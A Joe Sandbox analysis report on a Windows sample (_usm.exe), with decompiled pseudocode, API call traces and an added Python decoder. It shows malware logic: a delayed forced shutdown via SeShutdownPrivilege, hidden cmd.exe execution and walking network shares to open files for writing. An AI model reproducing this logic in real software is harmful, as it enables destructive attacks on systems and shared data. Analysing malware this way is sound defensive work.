    • EncodePointer.KERNEL32(?,001418AC), ref: 00142BBA
    • EncodePointer.KERNEL32(?,001418AC), ref: 00142BC7
    • EncodePointer.KERNEL32(?,001418AC), ref: 00142BD4
    • EncodePointer.KERNEL32(?,001418AC), ref: 00142BE1
      • Part of subcall function 00142F5C: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 00142F84
    • DecodePointer.KERNEL32(001429B4,?,001418AC), ref: 00142C02
      • Part of subcall function 001444AD: Sleep.KERNEL32(00000000), ref: 001444D5
    • DecodePointer.KERNEL32(00000000,?,001418AC), ref: 00142C31
      • Part of subcall function 0014286D: GetModuleHandleW.KERNEL32(KERNEL32.DLL,00147BE0,00000008,00142975,00000000,00000000,?,00141E3B,00000003), ref: 0014287E
      • Part of subcall function 0014286D: InterlockedIncrement.KERNEL32(00149320), ref: 001428BF
    • GetCurrentThreadId.KERNEL32(?,001418AC), ref: 00142C43
      • Part of subcall function 00142830: DecodePointer.KERNEL32(00000003,00142C59,?,001418AC), ref: 00142841
      • Part of subcall function 00142830: TlsFree.KERNEL32(00000007,00142C59,?,001418AC), ref: 0014285B
      • Part of subcall function 00142830: DeleteCriticalSection.KERNEL32(00000000,00000000,774FA0FD,?,00142C59,?,001418AC), ref: 00142FC3
      • Part of subcall function 00142830: DeleteCriticalSection.KERNEL32(00000007,774FA0FD,?,00142C59,?,001418AC), ref: 00142FED
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd

    Control-flow Graph

    C-Code - Quality: 51%
    			E00141822(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr _t22;
    				void* _t26;
    				intOrPtr _t28;
    				void* _t29;
    				void* _t30;
    				void* _t31;
    				intOrPtr _t32;
    				void* _t45;
    				signed int _t46;
    				void* _t49;
    				void* _t53;
    				intOrPtr _t55;
    				void* _t56;
    
    				_t50 = __edi;
    				_t49 = __edx;
    				_t43 = __ebx;
    				_push(0x58);
    				_push(0x147ba0);
    				E00142C80(__ebx, __edi, __esi);
    				GetStartupInfoW(_t53 - 0x68);
    				_t55 =  *0x14a8bc; // 0x0
    				if(_t55 == 0) {
    					__imp__HeapSetInformation(0, 1, 0, 0);
    				}
    				_t56 =  *0x140000 - 0x5a4d; // 0x5a4d
    				if(_t56 == 0) {
    					_t22 =  *0x14003c; // 0xe8
    					__eflags =  *((intOrPtr*)(_t22 + 0x140000)) - 0x4550;
    					if( *((intOrPtr*)(_t22 + 0x140000)) != 0x4550) {
    						goto L3;
    					} else {
    						_t44 = 0x10b;
    						__eflags =  *((intOrPtr*)(_t22 + 0x140018)) - 0x10b;
    						if( *((intOrPtr*)(_t22 + 0x140018)) != 0x10b) {
    							goto L3;
    						} else {
    							__eflags =  *((intOrPtr*)(_t22 + 0x140074)) - 0xe;
    							if( *((intOrPtr*)(_t22 + 0x140074)) <= 0xe) {
    								goto L3;
    							} else {
    								__eflags =  *(_t22 + 0x1400e8);
    								_t8 =  *(_t22 + 0x1400e8) != 0;
    								__eflags = _t8;
    								_t44 = 0 | _t8;
    								 *(_t53 - 0x1c) = _t8;
    							}
    						}
    					}
    				} else {
    					L3:
    					 *(_t53 - 0x1c) = 0;
    				}
    				if(E00142C5E() == 0) {
    					E001417F9(0x1c);
    					_pop(_t44);
    				}
    				if(E00142AE3(_t43, _t49) == 0) {
    					E001417F9(0x10);
    					_pop(_t44);
    				}
    				E0014279E();
    				 *((intOrPtr*)(_t53 - 4)) = 0;
    				_t26 = E00142559(); // executed
    				_t59 = _t26;
    				if(_t26 < 0) {
    					E00141DBC(_t49, _t59);
    					_t44 = 0x1b;
    				}
    				 *0x14a8b8 = GetCommandLineA(); // executed
    				_t28 = E001424C2(); // executed
    				 *0x149b20 = _t28;
    				_t29 = E00142407(_t44);
    				_t60 = _t29;
    				if(_t29 < 0) {
    					E00141DBC(_t49, _t60);
    					_t44 = 8;
    				}
    				_t30 = E00142191(_t44, _t49, _t50);
    				_t61 = _t30;
    				if(_t30 < 0) {
    					_push(9);
    					E00141DBC(_t49, _t61);
    				}
    				_t31 = E00141B9B(_t50, 0, 1); // executed
    				_pop(_t45);
    				_t62 = _t31;
    				if(_t31 != 0) {
    					E00141DBC(_t49, _t62);
    					_t45 = _t31;
    				}
    				_t32 = E00142132(_t45);
    				if(( *(_t53 - 0x3c) & 0x00000001) == 0) {
    					_t46 = 0xa;
    				} else {
    					_t46 =  *(_t53 - 0x38) & 0x0000ffff;
    				}
    				_push(_t46);
    				_push(_t32);
    				_push(0);
    				_push(0x140000); // executed
    				E001416E9(); // executed
    				 *((intOrPtr*)(_t53 - 0x20)) = _t32;
    				if( *(_t53 - 0x1c) == 0) {
    					E00141D72(_t32);
    				}
    				E00141D9E();
    				 *((intOrPtr*)(_t53 - 4)) = 0xfffffffe;
    				return E00142CC5( *((intOrPtr*)(_t53 - 0x20)));
    			}

    APIs
    • GetStartupInfoW.KERNEL32(?,00147BA0,00000058), ref: 00141832
    • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 00141847
      • Part of subcall function 00142C5E: HeapCreate.KERNELBASE(00000000,00001000,00000000,0014189B), ref: 00142C67
      • Part of subcall function 00142AE3: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,001418AC), ref: 00142AEB
      • Part of subcall function 00142AE3: GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,001418AC), ref: 00142B0D
      • Part of subcall function 00142AE3: GetProcAddress.KERNEL32(00000000,FlsGetValue,?,001418AC), ref: 00142B1A
      • Part of subcall function 00142AE3: GetProcAddress.KERNEL32(00000000,FlsSetValue,?,001418AC), ref: 00142B27
      • Part of subcall function 00142AE3: GetProcAddress.KERNEL32(00000000,FlsFree,?,001418AC), ref: 00142B34
      • Part of subcall function 00142AE3: TlsAlloc.KERNEL32(?,001418AC), ref: 00142B84
      • Part of subcall function 00142AE3: TlsSetValue.KERNEL32(00000000,?,001418AC), ref: 00142B9F
      • Part of subcall function 00142AE3: EncodePointer.KERNEL32(?,001418AC), ref: 00142BBA
      • Part of subcall function 00142AE3: EncodePointer.KERNEL32(?,001418AC), ref: 00142BC7
      • Part of subcall function 00142AE3: EncodePointer.KERNEL32(?,001418AC), ref: 00142BD4
      • Part of subcall function 00142AE3: EncodePointer.KERNEL32(?,001418AC), ref: 00142BE1
      • Part of subcall function 00142AE3: DecodePointer.KERNEL32(001429B4,?,001418AC), ref: 00142C02
      • Part of subcall function 00142AE3: DecodePointer.KERNEL32(00000000,?,001418AC), ref: 00142C31
      • Part of subcall function 00142AE3: GetCurrentThreadId.KERNEL32(?,001418AC), ref: 00142C43
    • __RTC_Initialize.LIBCMT ref: 001418B8
      • Part of subcall function 00142559: GetStartupInfoW.KERNEL32(?), ref: 00142566
      • Part of subcall function 00142559: GetFileType.KERNEL32(?), ref: 00142699
      • Part of subcall function 00142559: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 001426CF
      • Part of subcall function 00142559: GetStdHandle.KERNEL32(-000000F6), ref: 00142723
      • Part of subcall function 00142559: GetFileType.KERNEL32(00000000), ref: 00142735
      • Part of subcall function 00142559: InitializeCriticalSectionAndSpinCount.KERNEL32(-0014A794,00000FA0), ref: 00142763
      • Part of subcall function 00142559: SetHandleCount.KERNEL32 ref: 0014278C
    • __amsg_exit.LIBCMT ref: 001418CB
    • GetCommandLineA.KERNEL32 ref: 001418D1
      • Part of subcall function 001424C2: GetEnvironmentStringsW.KERNEL32 ref: 001424CC
      • Part of subcall function 001424C2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0014250A
      • Part of subcall function 001424C2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0014252D
      • Part of subcall function 001424C2: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00142540
      • Part of subcall function 001424C2: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0014254C
      • Part of subcall function 00142407: GetModuleFileNameA.KERNEL32(00000000,C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe,00000104), ref: 00142433
      • Part of subcall function 00142407: _parse_cmdline.LIBCMT ref: 0014245E
      • Part of subcall function 00142407: _parse_cmdline.LIBCMT ref: 0014249F
    • __amsg_exit.LIBCMT ref: 001418F1
      • Part of subcall function 00142191: _strlen.LIBCMT ref: 001421BB
      • Part of subcall function 00142191: _strlen.LIBCMT ref: 001421EC
    • __amsg_exit.LIBCMT ref: 00141902
      • Part of subcall function 00141B9B: __initterm_e.LIBCMT ref: 00141BD1
    • __amsg_exit.LIBCMT ref: 00141915
      • Part of subcall function 001416E9: Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00141704
      • Part of subcall function 001416E9: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00141714
      • Part of subcall function 001416E9: GetCurrentProcess.KERNEL32 ref: 00141734
      • Part of subcall function 001416E9: OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 00141741
      • Part of subcall function 001416E9: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000010,00000000,00000000), ref: 00141753
      • Part of subcall function 001416E9: Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 001417AB
      • Part of subcall function 001416E9: CreateThread.KERNEL32(00000000,00000000,Function_000016BF,00000000,00000000,00000000), ref: 001417C0
      • Part of subcall function 001416E9: Sleep.KERNELBASE(0036EE80), ref: 001417CB
      • Part of subcall function 001416E9: InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00050000), ref: 001417DC
      • Part of subcall function 001416E9: ExitProcess.KERNEL32 ref: 001417E3
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd

    Control-flow Graph

    C-Code - Quality: 76%
    			E00141000(void* __ebx, intOrPtr _a4) {
    				signed int _v8;
    				short _v1048;
    				short _v2088;
    				WCHAR* _v2092;
    				intOrPtr _v2096;
    				struct _PROCESS_INFORMATION _v2112;
    				struct _STARTUPINFOW _v2180;
    				void* __edi;
    				void* __esi;
    				signed int _t23;
    				int _t36;
    				void* _t45;
    				long _t46;
    				struct _PROCESS_INFORMATION* _t47;
    				WCHAR* _t48;
    				signed int _t49;
    
    				_t42 = __ebx;
    				_t23 =  *0x149004; // 0x20251455
    				_v8 = _t23 ^ _t49;
    				_t46 = 0x44;
    				_t48 = 0;
    				_v2096 = _a4;
    				_v2092 = 0;
    				E00144DA0( &_v2180, 0, _t46);
    				_v2180.dwFlags = _v2180.dwFlags | 0x00000101;
    				_v2180.cb = _t46;
    				_v2180.wShowWindow = 0;
    				_t47 =  &_v2112;
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				wsprintfW( &_v1048, L"%s %s %s", L"C:\\Windows\\system32\\cmd.exe /c", __ebx, _v2096);
    				GetSystemDirectoryW( &_v2088, 0x410);
    				_t36 = CreateProcessW(0,  &_v1048, 0, 0, 0, 0, 0, 0,  &_v2180,  &_v2112); // executed
    				if(_t36 != 0) {
    					WaitForSingleObject(_v2112.hProcess, 0xffffffff);
    					_t48 = CloseHandle;
    					CloseHandle(_v2112);
    					CloseHandle(_v2112.hThread);
    					_v2092 = 1;
    				}
    				return E001417EA(_v2092, _t42, _v8 ^ _t49, _t45, _t47, _t48);
    			}

    APIs
    • wsprintfW.USER32 ref: 00141072
    • GetSystemDirectoryW.KERNEL32(?,00000410), ref: 00141087
    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 001410A9
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001410BB
    • CloseHandle.KERNEL32(?), ref: 001410CD
    • CloseHandle.KERNEL32(?), ref: 001410D5
      • Part of subcall function 001417EA: IsDebuggerPresent.KERNEL32 ref: 00141A54
      • Part of subcall function 001417EA: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00141A69
      • Part of subcall function 001417EA: UnhandledExceptionFilter.KERNEL32(001461B8), ref: 00141A74
      • Part of subcall function 001417EA: GetCurrentProcess.KERNEL32(C0000409), ref: 00141A90
      • Part of subcall function 001417EA: TerminateProcess.KERNEL32(00000000), ref: 00141A97
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
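The argument lists in this report record raw 32-bit values and give no names. The Python decoder below is added here as an example; it is not Joe Sandbox code and not code from the analysed sample. It parses the report's `Name.MODULE(args), ref: addr` annotation lines (the input lines are copied from this page: the shutdown path under subcall 001416E9 and the CreateProcessW call of E00141000) and maps the constants to their Windows SDK names: the token access mask 0x28, the Sleep interval 0x36EE80, the six InitiateSystemShutdownExW arguments and the STARTUPINFOW values that E00141000 sets (dwFlags 0x101, wShowWindow 0). Two readings of the decompiled launcher that the decoder makes explicit: with STARTF_USESTDHANDLES set over a zeroed STARTUPINFOW and bInheritHandles FALSE, the child cmd.exe starts with NULL standard handles and a hidden window; and the GetSystemDirectoryW result written to _v2088 is never used in that function. The decode tables cover only the calls named here; every other call is returned with its raw arguments.

```python
"""Decoder for the `Name.MODULE(args), ref: addr` annotations in this report.
Added example: not part of Joe Sandbox or of the analysed sample.  Flag names and
values are taken from the Windows SDK headers."""
import re

# Copied from this page: the shutdown path under subcall 001416E9 and the
# CreateProcessW of E00141000.  They are the sample input the decoder runs on.
REPORT_LINES = [
    "Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00141704",
    "LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00141714",
    "OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 00141741",
    "AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000010,00000000,00000000), ref: 00141753",
    "CreateThread.KERNEL32(00000000,00000000,Function_000016BF,00000000,00000000,00000000), ref: 001417C0",
    "Sleep.KERNELBASE(0036EE80), ref: 001417CB",
    "InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00050000), ref: 001417DC",
    "ExitProcess.KERNEL32 ref: 001417E3",
    "CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 001410A9",
]

LINE_RE = re.compile(
    r"^(?P<func>\w+)\.(?P<module>\w+)"     # Sleep.KERNELBASE
    r"(?:\((?P<args>[^)]*)\),)?"           # optional (a,b,c) and the comma that follows it
    r" ref: (?P<ref>[0-9A-Fa-f]{8})$"      # call-site address
)
HEX32 = re.compile(r"-?[0-9A-Fa-f]{8}")

def parse_api_line(line):
    """Split one annotation into function, module, argument list and call-site address.
    Captured 32-bit values become ints; '?' (not captured) and symbols stay strings."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"not an API annotation: {line!r}")
    args = []
    for tok in (m.group("args") or "").split(","):
        tok = tok.strip()
        if not tok:
            continue
        args.append(int(tok, 16) if HEX32.fullmatch(tok) else tok)
    return {"func": m.group("func"), "module": m.group("module"),
            "args": args, "ref": int(m.group("ref"), 16)}

def named_flags(value, table):
    """Render a bitmask with SDK names; bits not in the table are kept as hex."""
    names = [name for bit, name in table if value & bit]
    rest = value & ~sum(bit for bit, _ in table)
    if rest:
        names.append(hex(rest))
    return "|".join(names) or "0"

TOKEN_ACCESS = [(0x0008, "TOKEN_QUERY"), (0x0020, "TOKEN_ADJUST_PRIVILEGES")]
STARTF = [(0x0001, "STARTF_USESHOWWINDOW"), (0x0100, "STARTF_USESTDHANDLES")]
SHTDN_MAJOR = {0x00050000: "SHTDN_REASON_MAJOR_SYSTEM"}

def decode(call):
    """Turn the raw arguments of the calls that matter here into named facts."""
    f, a = call["func"], call["args"]
    if f == "LookupPrivilegeValueW" and len(a) >= 2:
        return {"privilege": a[1]}
    if f == "OpenProcessToken" and len(a) >= 2:
        return {"desired_access": named_flags(a[1], TOKEN_ACCESS)}
    if f == "CreateThread" and len(a) >= 3:
        return {"start_routine": a[2]}
    if f == "Sleep" and a:
        return {"sleep_ms": a[0], "sleep_min": a[0] / 60000}
    if f == "InitiateSystemShutdownExW" and len(a) == 6:
        # (lpMachineName, lpMessage, dwTimeout, bForceAppsClosed, bRebootAfterShutdown, dwReason)
        return {"local_machine": a[0] == 0, "timeout_s": a[2],
                "force_apps_closed": bool(a[3]), "reboot": bool(a[4]),
                "reason_major": SHTDN_MAJOR.get(a[5] & 0xFFFF0000, hex(a[5] & 0xFFFF0000))}
    if f == "CreateProcessW" and len(a) == 10:
        # lpApplicationName NULL: the executable is the first token of lpCommandLine
        return {"app_from_cmdline": a[0] == 0, "inherit_handles": bool(a[4])}
    return {}

def decode_startupinfo(dw_flags, w_show_window):
    """The STARTUPINFOW values E00141000 sets: dwFlags |= 0x101, wShowWindow = 0."""
    show = "SW_HIDE" if w_show_window == 0 else str(w_show_window)
    return f"{named_flags(dw_flags, STARTF)}, wShowWindow={show}"

def summarize(lines):
    """Decoded timeline in call order: (function, call-site address, facts)."""
    calls = [parse_api_line(line) for line in lines]
    return [(c["func"], c["ref"], decode(c)) for c in calls]

if __name__ == "__main__":
    for func, ref, facts in summarize(REPORT_LINES):
        print(f"{ref:08x} {func:28s} {facts}")
    print(decode_startupinfo(0x101, 0))
```

Running the block prints the decoded timeline: the sample enables SeShutdownPrivilege on its own token, starts the thread at Function_000016BF, sleeps 60 minutes, then issues a forced local shutdown without reboot under SHTDN_REASON_MAJOR_SYSTEM and exits.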

    Control-flow Graph

    C-Code - Quality: 78%
    			E00142559() {
    				intOrPtr* _v8;
    				void** _v12;
    				struct _STARTUPINFOW _v80;
    				signed int _t61;
    				void* _t62;
    				long _t65;
    				signed int _t68;
    				signed int _t69;
    				signed int _t70;
    				int _t72;
    				signed int _t73;
    				intOrPtr* _t74;
    				void* _t77;
    				long _t85;
    				signed int _t86;
    				signed int _t87;
    				signed int _t88;
    				signed int _t91;
    				int _t93;
    				signed char _t98;
    				void* _t108;
    				signed int _t110;
    				signed int* _t111;
    				int _t112;
    				void** _t115;
    				void** _t120;
    				signed int _t121;
    
    				GetStartupInfoW( &_v80);
    				_push(0x40);
    				_t112 = 0x20;
    				_push(_t112); // executed
    				_t61 = E001444AD(); // executed
    				if(_t61 != 0) {
    					_t2 = _t61 + 0x800; // 0x800
    					 *0x14a7a0 = _t61;
    					 *0x14a790 = _t112;
    					__eflags = _t61 - _t2;
    					if(_t61 >= _t2) {
    						L5:
    						__eflags = _v80.cbReserved2;
    						if(_v80.cbReserved2 == 0) {
    							L27:
    							_t91 = 0;
    							__eflags = 0;
    							do {
    								_t115 = (_t91 << 6) +  *0x14a7a0;
    								_t62 =  *_t115;
    								__eflags = _t62 - 0xffffffff;
    								if(_t62 == 0xffffffff) {
    									L31:
    									_t115[1] = 0x81;
    									__eflags = _t91;
    									if(_t91 != 0) {
    										_t50 = _t91 - 1; // -1
    										asm("sbb eax, eax");
    										_t65 =  ~_t50 + 0xfffffff5;
    										__eflags = _t65;
    									} else {
    										_t65 = 0xfffffff6;
    									}
    									_t108 = GetStdHandle(_t65);
    									__eflags = _t108 - 0xffffffff;
    									if(_t108 == 0xffffffff) {
    										L43:
    										_t58 =  &(_t115[1]);
    										 *_t58 = _t115[1] | 0x00000040;
    										__eflags =  *_t58;
    										 *_t115 = 0xfffffffe;
    										goto L44;
    									} else {
    										__eflags = _t108;
    										if(_t108 == 0) {
    											goto L43;
    										}
    										_t69 = GetFileType(_t108);
    										__eflags = _t69;
    										if(_t69 == 0) {
    											goto L43;
    										}
    										_t70 = _t69 & 0x000000ff;
    										 *_t115 = _t108;
    										__eflags = _t70 - 2;
    										if(_t70 != 2) {
    											__eflags = _t70 - 3;
    											if(_t70 == 3) {
    												_t53 =  &(_t115[1]);
    												 *_t53 = _t115[1] | 0x00000008;
    												__eflags =  *_t53;
    											}
    										} else {
    											_t115[1] = _t115[1] | 0x00000040;
    										}
    										_t55 =  &(_t115[3]); // -1353620
    										_t72 = InitializeCriticalSectionAndSpinCount(_t55, 0xfa0);
    										__eflags = _t72;
    										if(_t72 == 0) {
    											L48:
    											_t68 = _t72 | 0xffffffff;
    											L46:
    											return _t68;
    										} else {
    											_t115[2] = _t115[2] + 1;
    											goto L44;
    										}
    									}
    								}
    								__eflags = _t62 - 0xfffffffe;
    								if(_t62 == 0xfffffffe) {
    									goto L31;
    								}
    								_t115[1] = _t115[1] | 0x00000080;
    								L44:
    								_t91 = _t91 + 1;
    								__eflags = _t91 - 3;
    							} while (_t91 < 3);
    							SetHandleCount( *0x14a790);
    							_t68 = 0;
    							__eflags = 0;
    							goto L46;
    						}
    						_t73 = _v80.lpReserved2;
    						__eflags = _t73;
    						if(_t73 == 0) {
    							goto L27;
    						}
    						_t93 =  *_t73;
    						_t74 = _t73 + 4;
    						_v8 = _t74;
    						_v12 = _t74 + _t93;
    						__eflags = _t93 - 0x800;
    						if(_t93 >= 0x800) {
    							_t93 = 0x800;
    						}
    						__eflags =  *0x14a790 - _t93; // 0x20
    						if(__eflags >= 0) {
    							L18:
    							_t110 = 0;
    							__eflags = _t93;
    							if(_t93 <= 0) {
    								goto L27;
    							} else {
    								goto L19;
    							}
    							do {
    								L19:
    								_t77 =  *_v12;
    								__eflags = _t77 - 0xffffffff;
    								if(_t77 == 0xffffffff) {
    									goto L26;
    								}
    								__eflags = _t77 - 0xfffffffe;
    								if(_t77 == 0xfffffffe) {
    									goto L26;
    								}
    								_t98 =  *_v8;
    								__eflags = _t98 & 0x00000001;
    								if((_t98 & 0x00000001) == 0) {
    									goto L26;
    								}
    								__eflags = _t98 & 0x00000008;
    								if((_t98 & 0x00000008) != 0) {
    									L24:
    									_t120 = ((_t110 & 0x0000001f) << 6) + 0x14a7a0[_t110 >> 5];
    									 *_t120 =  *_v12;
    									_t120[1] =  *_v8;
    									_t40 =  &(_t120[3]); // 0xc
    									_t72 = InitializeCriticalSectionAndSpinCount(_t40, 0xfa0);
    									__eflags = _t72;
    									if(_t72 == 0) {
    										goto L48;
    									}
    									_t41 =  &(_t120[2]);
    									 *_t41 = _t120[2] + 1;
    									__eflags =  *_t41;
    									goto L26;
    								}
    								_t85 = GetFileType(_t77);
    								__eflags = _t85;
    								if(_t85 == 0) {
    									goto L26;
    								}
    								goto L24;
    								L26:
    								_v12 =  &(_v12[1]);
    								_t110 = _t110 + 1;
    								_v8 = _v8 + 1;
    								__eflags = _t110 - _t93;
    							} while (_t110 < _t93);
    							goto L27;
    						} else {
    							_t111 = 0x14a7a4;
    							while(1) {
    								_t86 = E001444AD(0x20, 0x40);
    								__eflags = _t86;
    								if(_t86 == 0) {
    									break;
    								}
    								 *0x14a790 =  *0x14a790 + 0x20;
    								_t16 = _t86 + 0x800; // 0x800
    								 *_t111 = _t86;
    								__eflags = _t86 - _t16;
    								if(_t86 >= _t16) {
    									L15:
    									_t111 =  &(_t111[1]);
    									__eflags =  *0x14a790 - _t93; // 0x20
    									if(__eflags < 0) {
    										continue;
    									}
    									goto L18;
    								}
    								_t87 = _t86 + 5;
    								__eflags = _t87;
    								do {
    									 *(_t87 - 5) =  *(_t87 - 5) | 0xffffffff;
    									 *(_t87 + 3) =  *(_t87 + 3) & 0x00000000;
    									 *(_t87 + 0x1f) =  *(_t87 + 0x1f) & 0x00000080;
    									 *(_t87 + 0x33) =  *(_t87 + 0x33) & 0x00000000;
    									 *((short*)(_t87 - 1)) = 0xa00;
    									 *((short*)(_t87 + 0x20)) = 0xa0a;
    									 *((char*)(_t87 + 0x2f)) = 0;
    									_t87 = _t87 + 0x40;
    									_t28 = _t87 - 5; // -74
    									__eflags = _t28 -  *_t111 + 0x800;
    								} while (_t28 <  *_t111 + 0x800);
    								goto L15;
    							}
    							_t93 =  *0x14a790; // 0x20
    							goto L18;
    						}
    					}
    					_t88 = _t61 + 5;
    					__eflags = _t88;
    					do {
    						 *(_t88 - 5) =  *(_t88 - 5) | 0xffffffff;
    						 *((short*)(_t88 - 1)) = 0xa00;
    						 *((intOrPtr*)(_t88 + 3)) = 0;
    						 *((short*)(_t88 + 0x1f)) = 0xa00;
    						 *((char*)(_t88 + 0x21)) = 0xa;
    						 *((intOrPtr*)(_t88 + 0x33)) = 0;
    						 *((char*)(_t88 + 0x2f)) = 0;
    						_t121 =  *0x14a7a0; // 0x12c09f0
    						_t88 = _t88 + 0x40;
    						_t11 = _t88 - 5; // -74
    						__eflags = _t11 - _t121 + 0x800;
    					} while (_t11 < _t121 + 0x800);
    					goto L5;
    				}
    				return _t61 | 0xffffffff;
    			}
    APIs
    • GetStartupInfoW.KERNEL32(?), ref: 00142566
      • Part of subcall function 001444AD: Sleep.KERNEL32(00000000), ref: 001444D5
    • GetFileType.KERNEL32(?), ref: 00142699
    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 001426CF
    • GetStdHandle.KERNEL32(-000000F6), ref: 00142723
    • GetFileType.KERNEL32(00000000), ref: 00142735
    • InitializeCriticalSectionAndSpinCount.KERNEL32(-0014A794,00000FA0), ref: 00142763
    • SetHandleCount.KERNEL32 ref: 0014278C
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd

    Control-flow Graph

    C-Code - Quality: 100%
    			E001415CB(void* __edx, struct _NETRESOURCE* _a4) {
    				int _v8;
    				void* _v12;
    				void* _v16;
    				int _v20;
    				int _v24;
    				int _v28;
    				int _t25;
    				void* _t28;
    				int _t32;
    				int _t35;
    				void* _t46;
    				void* _t52;
    				short** _t53;
    				signed int _t54;
    				void* _t56;
    
    				_t46 = __edx;
    				_t56 = (_t54 & 0xfffffff8) - 0x1c;
    				_v20 = _v20 | 0xffffffff;
    				_v28 = 0x4000;
    				_t25 = WNetOpenEnumW(2, 0, 0, _a4,  &_v16); // executed
    				if(_t25 == 0) {
    					_t28 = GlobalAlloc(0x40, _v28); // executed
    					_t52 = _t28;
    					_v12 = _t52;
    					goto L2;
    					do {
    						while(1) {
    							L2:
    							E00144DA0(_t52, 0, _v28);
    							_t56 = _t56 + 0xc;
    							_t32 = WNetEnumResourceW(_v16,  &_v20, _t52,  &_v28); // executed
    							_v8 = _t32;
    							if(_t32 != 0) {
    								goto L11;
    							}
    							_v24 = 0;
    							if(_v20 <= 0) {
    								continue;
    							} else {
    								_t53 = _t52 + 0x14;
    								do {
    									_t15 = _t53 - 0x14; // -40
    									_t44 = _t15;
    									_t35 = WNetAddConnection2W(_t15, 0, 0, 4); // executed
    									if(_t35 == 0) {
    										E00141441(_t46,  *_t53);
    										WNetCancelConnection2W( *_t53, 0, 1);
    									}
    									if(( *(_t53 - 8) & 0x00000002) == 2) {
    										E001415CB(_t46, _t44); // executed
    									}
    									_v24 = _v24 + 1;
    									_t53 =  &(_t53[8]);
    								} while (_v24 < _v20);
    								_t52 = _v12;
    							}
    							goto L11;
    						}
    						L11:
    					} while (_v8 != 0x103);
    					GlobalFree(_t52);
    					WNetCloseEnum(_v16);
    				}
    				return 1;
    			}
    APIs
    • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 001415F2
    • GlobalAlloc.KERNELBASE(00000040,?,?,?,?,?,?,?,?,?,001416E2,00000000), ref: 00141606
    • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 0014162F
    • WNetAddConnection2W.MPR(-00000028,00000000,00000000,00000004), ref: 00141652
      • Part of subcall function 00141441: wsprintfW.USER32 ref: 0014146D
      • Part of subcall function 00141441: FindFirstFileW.KERNEL32(?,?), ref: 00141484
      • Part of subcall function 00141441: GetProcessHeap.KERNEL32(00000008,00000410), ref: 001414AC
      • Part of subcall function 00141441: HeapAlloc.KERNEL32(00000000), ref: 001414AF
      • Part of subcall function 00141441: PathAppendW.SHLWAPI(00000000,?), ref: 001414C2
      • Part of subcall function 00141441: PathAppendW.SHLWAPI(?,?), ref: 001414D1
      • Part of subcall function 00141441: StrCmpCW.SHLWAPI(?,00147918), ref: 001414EE
      • Part of subcall function 00141441: StrCmpCW.SHLWAPI(?,0014791C), ref: 00141504
      • Part of subcall function 00141441: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,00000080,00000000), ref: 0014153D
      • Part of subcall function 00141441: GetFileSizeEx.KERNEL32(00000000,?), ref: 00141552
